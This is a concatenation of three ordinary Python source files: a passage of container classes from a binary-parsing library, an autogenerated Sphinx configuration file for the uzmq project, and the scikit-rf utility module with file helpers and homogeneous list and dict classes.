    Decorator factory that guards a method against infinite recursion: while
    a call is in progress on an object, any reentrant call on that same
    object returns ``retval`` immediately instead of recursing.
    """
    def decorator(method):
        def guarded(self, *args, **kw):
            if getattr(self, lock_name, False):
                # Already inside this method for this object: short-circuit.
                return retval
            setattr(self, lock_name, True)
            try:
                return method(self, *args, **kw)
            finally:
                # Always release so later top-level calls run normally.
                delattr(self, lock_name)
        guarded.__name__ = method.__name__
        return guarded
    return decorator
class Container(dict):
    r"""
    Generic ordered dictionary that allows both key and attribute access, and preserve key order by insertion. Also it uses __call__ method to chain add keys, because **kw does not preserve order.

    Struct and Sequence, and few others parsers returns a container, since their members have order so do keys.

    Example::

        Container([ ("name","anonymous"), ("age",21) ])
        Container(name="anonymous")(age=21)
        # Note that this syntax does NOT work before python 3.6 due to unordered keyword arguments:
        Container(name="anonymous", age=21)
        Container(container2)
    """
    # __keys_order__ keeps insertion order; __recursion_lock__ backs the
    # recursion_lock decorator used by __repr__/__str__.
    __slots__ = ["__keys_order__", "__recursion_lock__"]

    def __init__(self, *args, **kw):
        object.__setattr__(self, "__keys_order__", [])
        # NOTE(review): *args is always a tuple, so this isinstance check can
        # never be true -- the branch looks like dead code; confirm intent.
        if isinstance(args, dict):
            for k, v in args.items():
                self[k] = v
            return
        for arg in args:
            if isinstance(arg, dict):
                for k, v in arg.items():
                    self[k] = v
            else:
                # assume an iterable of (key, value) pairs
                for k, v in arg:
                    self[k] = v
        for k, v in kw.items():
            self[k] = v

    def __getstate__(self):
        # Pickle only the key order; dict content is handled by dict itself.
        return self.__keys_order__

    def __setstate__(self, state):
        self.__keys_order__ = state

    def __getattr__(self, name):
        """Attribute access falls back to item access for non-slot names."""
        try:
            if name in self.__slots__:
                try:
                    return object.__getattribute__(self, name)
                except AttributeError as e:
                    # Lazily create the key-order list if it is missing
                    # (e.g. after unpickling paths that skip __init__).
                    if name == "__keys_order__":
                        object.__setattr__(self, "__keys_order__", [])
                        return []
                    else:
                        raise e
            else:
                return self[name]
        except KeyError:
            raise AttributeError(name)

    def __setitem__(self, key, val):
        # Slot names go to real attributes; everything else is a dict entry
        # whose first insertion is recorded in __keys_order__.
        if key in self.__slots__:
            object.__setattr__(self, key, val)
        else:
            if key not in self:
                if not hasattr(self, "__keys_order__"):
                    object.__setattr__(self, "__keys_order__", [key])
                else:
                    self.__keys_order__.append(key)
            dict.__setitem__(self, key, val)

    def __delitem__(self, key):
        """Removes an item from the Container in linear time O(n)."""
        if key in self.__slots__:
            object.__delattr__(self, key)
        else:
            dict.__delitem__(self, key)
            self.__keys_order__.remove(key)

    # Attribute syntax is an alias for item syntax.
    __delattr__ = __delitem__
    __setattr__ = __setitem__

    def __call__(self, **kw):
        """Chains adding new entries to the same container. See ctor."""
        for k,v in kw.items():
            self.__setitem__(k, v)
        return self

    def clear(self):
        dict.clear(self)
        del self.__keys_order__[:]

    def pop(self, key, *default):
        """Removes and returns the value for a given key, raises KeyError if not found."""
        val = dict.pop(self, key, *default)
        self.__keys_order__.remove(key)
        return val

    def popitem(self):
        """Removes and returns the last key and value from order."""
        k = self.__keys_order__.pop()
        v = dict.pop(self, k)
        return k, v

    def update(self, seqordict, **kw):
        # Accepts either a dict or an iterable of (key, value) pairs.
        if isinstance(seqordict, dict):
            for k, v in seqordict.items():
                self[k] = v
        else:
            for k, v in seqordict:
                self[k] = v
        dict.update(self, kw)

    def copy(self):
        # Shallow copy preserving key order.
        return Container(self.items())

    __update__ = update
    __copy__ = copy

    def __len__(self):
        return len(self.__keys_order__)

    def keys(self):
        # Iterate keys in insertion order, not dict order.
        return iter(self.__keys_order__)

    def values(self):
        return (self[k] for k in self.__keys_order__)

    def items(self):
        return ((k, self[k]) for k in self.__keys_order__)

    __iter__ = keys

    def __eq__(self, other):
        # Order-insensitive equality against any dict-like mapping.
        if not isinstance(other, dict):
            return False
        if len(self) != len(other):
            return False
        for k,v in self.items():
            if k not in other or v != other[k]:
                return False
        for k,v in other.items():
            if k not in self or v != self[k]:
                return False
        return True

    def _search(self, name, search_all):
        # Depth-first search through nested Container/ListContainer values;
        # returns a list of all matches (search_all) or the first match.
        items = []
        for key in self.keys():
            try:
                if key == name:
                    if search_all:
                        items.append(self[key])
                    else:
                        return self[key]
                if type(self[key]) == Container or type(self[key]) == ListContainer:
                    ret = self[key]._search(name, search_all)
                    if ret is not None:
                        if search_all:
                            items.extend(ret)
                        else:
                            return ret
            except:
                pass
        if search_all:
            return items
        else:
            return None

    def search(self, name):
        # First value stored under `name`, searched recursively, or None.
        return self._search(name, False)

    def search_all(self, name):
        # All values stored under `name`, searched recursively.
        return self._search(name, True)

    @recursion_lock()
    def __repr__(self):
        # Keys that are underscore-prefixed strings are treated as private
        # and omitted from the representation.
        parts = ["Container"]
        for k,v in self.items():
            if not isinstance(k,str) or not k.startswith("_"):
                parts.extend(["(",str(k),"=",repr(v),")"])
        if len(parts) == 1:
            parts.append("()")
        return "".join(parts)

    @recursion_lock()
    def __str__(self, indentation="\n    "):
        # NOTE(review): truncation is only applied when fullprinting is
        # enabled, which looks inverted relative to the documented intent of
        # getglobalfullprinting -- confirm before relying on it.
        fullprinting = getglobalfullprinting()
        printingcap = 64
        text = ["Container: "]
        for k,v in self.items():
            if not isinstance(k,str) or not k.startswith("_"):
                text.extend([indentation, str(k), " = "])
                if isinstance(v, stringtypes) and fullprinting:
                    if len(v) <= printingcap:
                        text.append("%s (total %d)" % (v[:printingcap], len(v)))
                    else:
                        text.append("%s... (truncated, total %d)" % (v[:printingcap], len(v)))
                else:
                    text.append(indentation.join(str(v).split("\n")))
        return "".join(text)
class FlagsContainer(Container):
    r"""
    Container made to represent a FlagsEnum, only equality skips order. Provides pretty-printing for flags. Only set flags are displayed.
    """

    @recursion_lock()
    def __str__(self, indentation="\n    "):
        # Render one "name = value" entry per set (truthy), public flag.
        pieces = ["FlagsContainer: "]
        for key, value in self.items():
            if key.startswith("_") or not value:
                continue
            rendered = indentation.join(str(value).split("\n"))
            pieces += [indentation, key, " = ", rendered]
        return "".join(pieces)
class ListContainer(list):
    r"""
    A generic container for lists. Provides pretty-printing.
    """
    @recursion_lock()
    def __str__(self, indentation="\n "):
        """Multi-line pretty print: one (possibly re-indented) entry per element."""
        pieces = ["ListContainer: "]
        for element in self:
            pieces.append(indentation)
            pieces.append(indentation.join(str(element).split("\n")))
        return "".join(pieces)

    def _search(self, name, search_all):
        # Delegate the search to every element that supports it; elements
        # without _search (or whose search raises) are skipped best-effort.
        found = []
        for element in self:
            try:
                result = element._search(name, search_all)
            except:
                continue
            if result is None:
                continue
            if search_all:
                found.extend(result)
            else:
                return result
        return found if search_all else None

    def search(self, name):
        """Return the first value found for ``name``, or None."""
        return self._search(name, search_all=False)

    def search_all(self, name):
        """Return a list of every value found for ``name``."""
        return self._search(name, search_all=True)
class LazyContainer(object):
    r"""
    Lazy equivalent to Container. Works the same but parses subcons on first access whenever possible.
    """
    __slots__ = ["keysbackend", "offsetmap", "cached", "stream", "addoffset", "context"]

    def __init__(self, keysbackend, offsetmap, cached, stream, addoffset, context):
        self.keysbackend = keysbackend
        self.offsetmap = offsetmap
        self.cached = cached
        self.stream = stream
        self.addoffset = addoffset
        self.context = context

    def __getitem__(self, key):
        """Parse the entry on first access; later hits come from the cache."""
        if key not in self.cached:
            offset, subcon = self.offsetmap[key]
            self.stream.seek(self.addoffset + offset)
            self.cached[key] = subcon._parse(self.stream, self.context, "lazy container")
            # Everything parsed: release the stream and the offset map.
            if len(self.cached) == len(self):
                self.offsetmap = None
                self.stream = None
        return self.cached[key]

    def __getattr__(self, name):
        # Attribute access falls through to item access, Container-style.
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name)

    def __len__(self):
        return len(self.keysbackend)

    def keys(self):
        return iter(self.keysbackend)

    def values(self):
        return (self[key] for key in self.keysbackend)

    def items(self):
        return ((key, self[key]) for key in self.keysbackend)

    __iter__ = keys

    def __eq__(self, other):
        """Equal to a dict with the same keys/values; forces a full parse."""
        if not isinstance(other, dict):
            return False
        if len(self) != len(other):
            return False
        for key, value in self.items():
            if key not in other or value != other[key]:
                return False
        for key, value in other.items():
            if key not in self.keysbackend or value != self[key]:
                return False
        return True

    def __str__(self):
        return "<LazyContainer: %d possible items, %d cached>" % (len(self), len(self.cached))
class LazyRangeContainer(ListContainer):
    r"""
    Lazy equivalent to ListContainer. Works the same but parses subcons on first access whenever possible.
    """
    __slots__ = ["subcon", "subsize", "count", "stream", "addoffset", "context", "cached", "offsetmap"]

    def __init__(self, subcon, subsize, count, stream, addoffset, context):
        self.subcon = subcon
        self.subsize = subsize
        self.count = count
        self.stream = stream
        self.addoffset = addoffset
        self.context = context
        self.cached = {}

    def __getitem__(self, index):
        """Parse element `index` on first access; all elements are fixed-size."""
        if not 0 <= index < len(self):
            raise ValueError("index %d out of range 0-%d" % (index, len(self) - 1))
        if index not in self.cached:
            # Fixed-size elements: the offset is simply index * subsize.
            self.stream.seek(self.addoffset + index * self.subsize)
            self.cached[index] = self.subcon._parse(self.stream, self.context, "lazy range container")
            if len(self.cached) == len(self):
                self.stream = None
        return self.cached[index]

    def __len__(self):
        return self.count

    def __iter__(self):
        return (self[i] for i in range(len(self)))

    def __eq__(self, other):
        if len(self) != len(other):
            return False
        return all(mine == theirs for mine, theirs in zip(self, other))

    def __repr__(self):
        return "<%s: %d possible items, %d cached>" % (self.__class__.__name__, len(self), len(self.cached))
class LazySequenceContainer(LazyRangeContainer):
    r"""
    Lazy equivalent to ListContainer. Works the same but parses subcons on first access whenever possible.
    """
    __slots__ = ["count", "offsetmap", "cached", "stream", "addoffset", "context"]

    def __init__(self, count, offsetmap, cached, stream, addoffset, context):
        self.count = count
        self.offsetmap = offsetmap
        self.cached = cached
        self.stream = stream
        self.addoffset = addoffset
        self.context = context

    def __getitem__(self, index):
        """Parse element `index` on first access; elements may differ in size."""
        if not 0 <= index < len(self):
            raise ValueError("index %d out of range 0-%d" % (index, len(self) - 1))
        if index not in self.cached:
            # Variable-size elements: each entry carries its own (offset, subcon).
            offset, subcon = self.offsetmap[index]
            self.stream.seek(self.addoffset + offset)
            self.cached[index] = subcon._parse(self.stream, self.context, "lazy sequence container")
            if len(self.cached) == len(self):
                self.offsetmap = None
                self.stream = None
        return self.cached[index]

    def __len__(self):
        return self.count
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# uzmq documentation build configuration file, created by
# sphinx-quickstart on Wed Nov 7 00:32:37 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import sys
class Mock(object):
    """Stand-in for modules whose real bindings (e.g. zmq) are unavailable
    on the docs builder, so autodoc can still import the project."""

    def __init__(self, *args, **kwargs):
        pass

    def __call__(self, *args, **kwargs):
        return Mock()

    @classmethod
    def __getattr__(cls, name):
        # Sphinx probes __file__/__path__ when it treats a Mock as a module.
        if name in ('__file__', '__path__'):
            return '/dev/null'
        # Capitalized names are assumed to be classes: return a fresh type so
        # "class Foo(mocked.Base)" definitions keep working.
        if name[0] == name[0].upper():
            mockType = type(name, (), {})
            mockType.__module__ = __name__
            return mockType
        return Mock()
# Modules to fake out so that `import uzmq` (below) succeeds even where the
# real bindings are missing.
MOCK_MODULES = ['zmq']
for mod_name in MOCK_MODULES:
    sys.modules[mod_name] = Mock()

on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
skip_coverage = os.environ.get('SKIP_COVERAGE', None) == 'True'

if on_rtd:
    # NOTE(review): redundant -- the same mocks were already installed
    # unconditionally above.
    for mod_name in MOCK_MODULES:
        sys.modules[mod_name] = Mock()

# Make the project sources importable so autodoc and the version lookup work.
CURDIR = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(CURDIR, '..', '..'))
sys.path.append(os.path.join(CURDIR, '..'))
sys.path.append(os.path.join(CURDIR, '.'))

import uzmq
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = 'uzmq'
copyright = '2012, Author'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version (read from the uzmq package imported above).
version = "%s.%s" % (uzmq.version_info[0], uzmq.version_info[1])
# The full version, including alpha/beta/rc tags.
# NOTE(review): left empty, so |release| renders as nothing -- confirm intended.
release = ''

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'uzmqdoc'

# -- Options for LaTeX output --------------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
    ('index', 'uzmq.tex', 'uzmq Documentation',
     'Author', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True

# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'uzmq', 'uzmq Documentation',
     ['Author'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False

# -- Options for Texinfo output ------------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    ('index', 'uzmq', 'uzmq Documentation',
     'Author', 'uzmq', 'One line description of project.',
     'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# -- Options for Epub output ---------------------------------------------------

# Bibliographic Dublin Core info.
epub_title = 'uzmq'
epub_author = 'Author'
epub_publisher = 'Author'
epub_copyright = '2012, Author'

# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''

# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''

# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''

# A unique identification for the text.
#epub_uid = ''

# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()

# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []

# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []

# A list of files that should not be packed into the epub file.
#epub_exclude_files = []

# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3

# Allow duplicate toc entries.
#epub_tocdup = True
| |
'''
.. currentmodule:: skrf.util
========================================
util (:mod:`skrf.util`)
========================================
Holds utility functions that are general conveniences.
General
------------
.. autosummary::
:toctree: generated/
now_string
find_nearest
find_nearest_index
get_fid
get_extn
'''
from . import mathFunctions as mf
import matplotlib as mpl
import warnings
import os, fnmatch
try:
    import cPickle as pickle
except ImportError:
    import pickle as pickle
import pylab as plb
import numpy as npy
from scipy.constants import mil
from datetime import datetime
import collections, pprint
# The abstract base classes moved to `collections.abc` in Python 3.3 and the
# old `collections.*` aliases were removed in 3.10; keep a Python 2 fallback.
try:
    from collections.abc import Sequence, MutableMapping
except ImportError:
    from collections import Sequence, MutableMapping
from subprocess import Popen,PIPE
# globals

# Py2/Py3 compatibility shim: `basestring` only exists on Python 2; on
# Python 3 fall back to (str, bytes) for isinstance() checks (see get_fid).
try:
    basestring
except NameError:
    basestring = (str, bytes)
# other
def now_string():
    '''
    returns a unique sortable string, representing the current time

    nice for generating date-time stamps to be used in file-names,
    the companion function :func:`now_string_2_dt` can be used
    to read these string back into datetime objects.

    Returns
    --------
    s : string
        current time with every separator normalized to '.', e.g.
        '2012.11.07.00.32.37.123456' (filename-safe and sortable)

    See Also
    ------------
    now_string_2_dt
    '''
    # str(datetime) -> 'YYYY-MM-DD HH:MM:SS.ffffff'; use the idiomatic str()
    # instead of calling the __str__ dunder directly.
    return str(datetime.now()).replace('-', '.').replace(':', '.').replace(' ', '.')
def now_string_2_dt(s):
    '''
    Converts the output of :func:`now_string` to a datetime object.

    See Also
    -----------
    now_string
    '''
    # Each '.'-separated field maps positionally onto the datetime constructor
    # (year, month, day, hour, minute, second[, microsecond]).
    fields = (int(token) for token in s.split('.'))
    return datetime(*fields)
def find_nearest(array, value):
    '''
    find nearest value in array.

    taken from http://stackoverflow.com/questions/2566412/find-nearest-value-in-numpy-array

    Parameters
    ----------
    array : numpy.ndarray
        array we are searching for a value in
    value : element of the array
        value to search for

    Returns
    --------
    found_value : an element of the array
        the value that is numerically closest to `value`
    '''
    # The element with the smallest absolute distance is the nearest one.
    distances = npy.abs(array - value)
    return array[distances.argmin()]
def find_nearest_index(array, value):
    '''
    find nearest value in array.

    Parameters
    ----------
    array : numpy.ndarray
        array we are searching for a value in
    value : element of the array
        value to search for

    Returns
    --------
    found_index : int
        the index at which the numerically closest element to `value`
        was found at

    taken from http://stackoverflow.com/questions/2566412/find-nearest-value-in-numpy-array
    '''
    # argmin over the absolute distances gives the nearest element's index.
    distances = npy.abs(array - value)
    return distances.argmin()
def slice_domain(x, domain):
    '''
    Returns a slice object closest to the `domain` of `x`

        domain = x[slice_domain(x, (start, stop))]

    Parameters
    -----------
    vector : array-like
        an array of values
    domain : tuple
        tuple of (start,stop) values defining the domain over
        which to slice

    Examples
    -----------
    >>> x = linspace(0,10,101)
    >>> idx = slice_domain(x, (2,6))
    >>> x[idx]
    '''
    # Nearest-element indices of the requested start/stop values; the stop
    # index is included in the slice, hence the +1.
    start_idx = npy.abs(x - domain[0]).argmin()
    stop_idx = npy.abs(x - domain[1]).argmin()
    return slice(start_idx, stop_idx + 1)
# file IO
def get_fid(file, *args, **kwargs):
    '''
    Returns a file object, given a filename or file object

    Useful when you want to allow the arguments of a function to
    be either files or filenames

    Parameters
    -------------
    file : str/unicode or file-object
        file to open
    \*args, \*\*kwargs : arguments and keyword arguments to `open()`
    '''
    # Anything that is not a string is assumed to already be a file object
    # and is passed through untouched.
    if not isinstance(file, basestring):
        return file
    return open(file, *args, **kwargs)
def get_extn(filename):
    '''
    Get the extension from a filename.

    The extension is defined as everything past the last '.'.
    Returns None if it ain't got one

    Parameters
    ------------
    filename : string
        the filename

    Returns
    --------
    ext : string, None
        either the extension (not including '.') or None if there
        isn't one
    '''
    ext = os.path.splitext(filename)[-1]
    # splitext keeps the leading '.'; strip it, or report no extension at all.
    return ext[1:] if ext else None
def basename_noext(filename):
    '''
    gets the basename and strips extension
    '''
    base = os.path.basename(filename)
    return os.path.splitext(base)[0]
# git
def git_version( modname):
    '''
    Returns output 'git describe', executed in a module's root directory.

    Returns None when git is unavailable, the directory is not a git
    checkout, or `git describe` produced no output.
    '''
    mod = __import__(modname)
    mod_dir = os.path.split(mod.__file__)[0]
    try:
        # Popen itself raises OSError when git is not installed, so it must
        # be inside the try as well (previously only communicate() was).
        p = Popen(['git', 'describe'], stdout=PIPE, stderr=PIPE, cwd=mod_dir)
        out, err = p.communicate()
    except OSError:
        return None
    # On Python 3, communicate() returns bytes; decode before strip()
    # (bytes.strip('\n') raises TypeError).
    if isinstance(out, bytes):
        out = out.decode('utf-8', 'replace')
    out = out.strip('\n')
    if out == '':
        return None
    return out
def stylely(rc_dict={}, style_file = 'skrf.mplstyle'):
    '''
    loads the rc-params from the specified file (file must be located in skrf/data)
    '''
    # NOTE(review): mutable default `rc_dict={}` is shared across calls; it is
    # only read here, but callers should not mutate it.
    from skrf.data import pwd # delayed to solve circular import
    rc = mpl.rc_params_from_file(os.path.join(pwd, style_file))
    mpl.rcParams.update(rc)
    # caller-supplied overrides win over the style file's values
    mpl.rcParams.update(rc_dict)
def dict_2_recarray(d, delim, dtype):
    '''
    Turns a dictionary of structured keys to a record array of objects

    This is useful if you save data-base like meta-data in the form
    or file-naming conventions, aka 'the poor-mans database'

    Examples
    -------------
    given a directory of networks like:

    >>> ls
    a1,0.0,0.0.s1p a1,3.0,3.0.s1p a2,3.0,-3.0.s1p b1,-3.0,3.0.s1p
    ...

    you can sort based on the values or each field, after defining their
    type with `dtype`. The `values` field accesses the objects.

    >>>d =rf.ran('/tmp/' )
    >>>delim =','
    >>>dtype = [('name', object),('voltage',float),('current',float)]
    >>>ra = dict_2_recarray(d=rf.ran(dir), delim=delim, dtype =dtype)

    then you can sift like you do with numpy arrays

    >>>ra[ra['voltage']<3]['values']
    '''
    # Split each key into its fields and append the dict's value as the
    # trailing 'values' column of the record.
    rows = [tuple(key.split(delim) + [d[key]]) for key in d.keys()]
    full_dtype = dtype + [('values', object)]
    return npy.array(rows, dtype=full_dtype)
def findReplace(directory, find, replace, filePattern):
    '''
    Find/replace some txt in all files in a directory, recursively

    This was found in [1]_.

    Examples
    -----------
    findReplace("some_dir", "find this", "replace with this", "*.txt")

    .. [1] http://stackoverflow.com/questions/4205854/python-way-to-recursively-find-and-replace-string-in-text-files
    '''
    for root, _dirs, filenames in os.walk(os.path.abspath(directory)):
        for fname in filenames:
            # Only touch files matching the glob-style pattern.
            if not fnmatch.fnmatch(fname, filePattern):
                continue
            full_path = os.path.join(root, fname)
            with open(full_path) as fh:
                contents = fh.read()
            with open(full_path, "w") as fh:
                fh.write(contents.replace(find, replace))
# general purpose objects
class HomoList(Sequence):
    '''
    A Homogeneous Sequence

    Provides a class for a list-like object which contains
    homogeneous values. Attributes of the values can be accessed through
    the attributes of HomoList. Searching is done like numpy arrays.

    Initialized from a list of all the same type

    >>> h = HomoDict([Foo(...), Foo(...)])

    The individual values of `h` can be access in identical fashion to
    Lists.

    >>> h[0]

    Assuming that `Foo` has property `prop`  and function `func` ...

    Access elements' properties:

    >>> h.prop

    Access elements' functions:

    >>> h.func()

    Searching:

    >>> h[h.prop == value]
    >>> h[h.prop < value]

    Multiple search:

    >>> h[set(h.prop==value1) & set( h.prop2==value2)]

    Combos:

    >>> h[h.prop==value].func()
    '''
    # NOTE: base class was `collections.Sequence`, an alias deprecated since
    # Python 3.3 and removed in 3.10; `Sequence` is imported from
    # collections.abc (with a Py2 fallback) at the top of this module.

    def __init__(self, list_):
        # Copy the input so later mutation of the argument has no effect.
        self.store = list(list_)

    # The comparison operators return the *indices* of matching elements,
    # enabling numpy-style selection: h[h.prop == value].
    def __eq__(self, value):
        return [k for k in range(len(self)) if self.store[k] == value ]

    def __ne__(self, value):
        return [k for k in range(len(self)) if self.store[k] != value ]

    def __gt__(self, value):
        return [k for k in range(len(self)) if self.store[k] > value ]

    def __ge__(self, value):
        return [k for k in range(len(self)) if self.store[k] >= value ]

    def __lt__(self, value):
        return [k for k in range(len(self)) if self.store[k] < value ]

    def __le__(self, value):
        return [k for k in range(len(self)) if self.store[k] <= value ]

    def __getattr__(self, name):
        # Broadcast attribute access onto every element.
        return self.__class__(
            [k.__getattribute__(name) for k in self.store])

    def __getitem__(self, idx):
        # Integer/slice indexing behaves like a list; any other iterable of
        # indices selects a sub-HomoList (numpy-style fancy indexing).
        try:
            return self.store[idx]
        except(TypeError):
            return self.__class__([self.store[k] for k in idx])

    def __call__(self, *args, **kwargs):
        # Broadcast a call onto every element.
        return self.__class__(
            [k(*args,**kwargs) for k in self.store])

    def __setitem__(self, idx, value):
        self.store[idx] = value

    def __delitem__(self, idx):
        del self.store[idx]

    def __iter__(self):
        return iter(self.store)

    def __len__(self):
        return len(self.store)

    def __str__(self):
        return pprint.pformat(self.store)

    def __repr__(self):
        return pprint.pformat(self.store)
class HomoDict(MutableMapping):
    '''
    A Homogeneous Mutable Mapping

    Provides a class for a dictionary-like object which contains
    homogeneous values. Attributes of the values can be accessed through
    the attributes of HomoDict. Searching is done like numpy arrays.

    Initialized from a dictionary containing values of all the same type

    >>> h = HomoDict({'a':Foo(...),'b': Foo(...), 'c':Foo(..)})

    The individual values of `h` can be access in identical fashion to
    Dictionaries.

    >>> h['key']

    Assuming that `Foo` has property `prop`  and function `func` ...

    Access elements' properties:

    >>> h.prop

    Access elements' functions:

    >>> h.func()

    Searching:

    >>> h[h.prop == value]
    >>> h[h.prop < value]

    Multiple search:

    >>> h[set(h.prop==value1) & set( h.prop2==value2)]

    Combos:

    >>> h[h.prop==value].func()
    '''
    # NOTE: base class was `collections.MutableMapping`, an alias deprecated
    # since Python 3.3 and removed in 3.10; `MutableMapping` is imported from
    # collections.abc (with a Py2 fallback) at the top of this module.

    def __init__(self, dict_):
        # Copy the input so later mutation of the argument has no effect.
        self.store = dict(dict_)

    # The comparison operators return the *keys* of matching values,
    # enabling numpy-style selection: h[h.prop == value].
    def __eq__(self, value):
        return [k for k in self.store if self.store[k] == value ]

    def __ne__(self, value):
        return [k for k in self.store if self.store[k] != value ]

    def __gt__(self, value):
        return [k for k in self.store if self.store[k] > value ]

    def __ge__(self, value):
        return [k for k in self.store if self.store[k] >= value ]

    def __lt__(self, value):
        return [k for k in self.store if self.store[k] < value ]

    def __le__(self, value):
        return [k for k in self.store if self.store[k] <= value ]

    def __getattr__(self, name):
        # Broadcast attribute access onto every value.
        return self.__class__(
            {k: getattr(self.store[k],name) for k in self.store})

    def __getitem__(self, key):
        # A string key behaves like a plain dict lookup; any other iterable
        # of keys selects a sub-HomoDict.
        if isinstance(key, str):
            return self.store[key]
        else:
            c =  self.__class__({k:self.store[k] for k in key})
            return c
        #if len(c) == 1:
        #    return  c.store.values()[0]
        #else:
        #    return c

    def __call__(self, *args, **kwargs):
        # Broadcast a call onto every value.
        return self.__class__(
            {k: self.store[k](*args, **kwargs) for k in self.store})

    def __setitem__(self, key, value):
        self.store[key] = value

    def __delitem__(self, key):
        del self.store[key]

    def __iter__(self):
        return iter(self.store)

    def __len__(self):
        return len(self.store)

    def __str__(self):
        return pprint.pformat(self.store)

    def __repr__(self):
        return pprint.pformat(self.store)

    def copy(self):
        return HomoDict(self.store)

    def filter_nones(self):
        # Drop every entry whose value is None, in place.
        self.store = {k:self.store[k] for k in self.store \
            if self.store[k] is not None}

    def filter(self, **kwargs):
        '''
        Filter self based on kwargs

        This is equivalent to:

        >>> h = HomoDict(...)
        >>> for k in kwargs:
        >>>     h = h[k ==kwargs[k]]
        >>> return h

        prefixing the kwarg value with a '!' causes a not equal test (!=)

        Examples
        ----------
        >>> h = HomoDict(...)
